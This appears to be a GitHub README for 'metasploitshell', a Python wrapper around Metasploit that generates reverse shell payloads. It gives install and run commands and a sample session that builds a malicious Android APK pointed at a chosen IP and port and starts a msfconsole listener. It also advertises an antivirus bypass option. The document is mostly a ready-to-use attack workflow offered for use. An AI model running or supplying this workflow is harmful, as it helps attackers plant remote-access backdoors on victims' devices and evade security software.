metasploitshell

made by khilesh

simple reverse shell gerneter tool

commands

    git clone https://github.com/khilesh114/metasploitshell
    cd metasploitshell
    sudo python3 msv.py

──(codex㉿kali)-[~/Desktop/projects/metasploitshell] └─$ python3 msv.py metasploit fremwork enter ip addres ex 127.0.0.1 enter port ex 8080 windows [1] linux [2] android [3] antivirus bypass [4] exit tool [5] enter a number :-3

_____ ____ | /___ ____ || | / _ \ / \ / __ |_ __ / _ | |/ __ | / __ | | / // | | | ( <> ) / // | (___ /| /___ | || _/|___ |

Enter ip address :-127.0.0.1 Enter a port nomber :-8080 [-] No platform was selected, choosing Msf::Module::Platform::Android from the payload [-] No arch selected, selecting arch: dalvik from the payload No encoder specified, outputting raw payload Payload size: 10231 bytes Saved as: android.apk Metasploit tip: Save the current environment with the save command, future console restarts will use this environment again

Metasploit Documentation: https://docs.metasploit.com/

[*] Processing android.txt for ERB directives. exit msfconsole

emsf6 > exit

#┌──(codex㉿kali)-[~/Desktop/projects/metasploitshell] any error exit msfconsole and run command

└─$ msfconsole -r android.txt